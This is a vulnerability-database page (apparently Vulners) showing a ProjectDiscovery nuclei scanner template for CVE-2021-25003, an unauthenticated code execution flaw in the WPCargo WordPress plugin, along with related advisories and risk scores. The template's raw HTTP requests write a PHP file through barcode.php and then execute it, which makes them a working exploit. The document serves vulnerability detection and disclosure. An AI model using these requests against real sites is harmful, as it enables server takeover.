Lucene search
K

WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 39 Views

WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution. Allows attacker to write PHP file, execute arbitrary code, and gain system control

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Code Injection in Wptaskforce Wpcargo_Track_\&_Trace
26 Jun 202213:07
githubexploit
ATTACKERKB
CVE-2021-25003
14 Mar 202200:00
attackerkb
Circl
CVE-2021-25003
29 Jun 202211:03
circl
CNNVD
WordPress plugin WPCargo Track & Trace 代码问题漏洞
14 Mar 202200:00
cnnvd
CVE
CVE-2021-25003
14 Mar 202214:41
cve
Cvelist
CVE-2021-25003 WPCargo < 6.9.0 - Unauthenticated RCE
14 Mar 202214:41
cvelist
NVD
CVE-2021-25003
14 Mar 202215:15
nvd
OSV
CVE-2021-25003
14 Mar 202215:15
osv
Patchstack
WordPress WPCargo Track & Trace plugin <= 6.8.9 - Unauthenticated Remote Code Execution (RCE) vulnerability
21 Feb 202200:00
patchstack
Prion
Design/Logic Flaw
14 Mar 202215:15
prion
Rows per page
id: CVE-2021-25003

info:
  name: WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: |
    WordPress WPCargo Track & Trace plugin before 6.9.0 is susceptible to remote code execution, The plugin contains a file which can allow an attacker to write a PHP file anywhere on the web server, leading to possible remote code execution. This can allow an attacker to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system.
  remediation: |
    Update to the latest version of the WPCargo Track & Trace plugin (6.9.0 or higher) to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
    - https://wordpress.org/plugins/wpcargo/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25003
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/WhooAmii/POC_to_review
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-25003
    cwe-id: CWE-434,CWE-94
    epss-score: 0.56148
    epss-percentile: 0.98928
    cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\&_trace:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: wptaskforce
    product: wpcargo_track_\&_trace
    framework: wordpress
  tags: cve2021,cve,rce,wpcargo,unauth,wordpress,wp,wp-plugin,wpscan,intrusive,wptaskforce,vkev,vuln
variables:
  num: "999999999"

http:
  - raw:
      - |
        GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        2={{md5(num)}}

    matchers:
      - type: dsl
        dsl:
          - status_code_1 != 200
          - status_code_2 == 200
          - status_code_3 == 200
          - contains(body_3, md5(num))
          - contains(body_3, 'PNG')
        condition: and
# digest: 4a0a0047304502202c42a29fc5062e5ceec38f770807c651b30617d6b490d096ff6e4845ee4f0f6a022100cd8aeab602f3ea8f32a24c4555786fc0801fe433ccce638578c5f2bf8af4a6c5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 27.5
CVSS 3.19.8
EPSS0.56148
39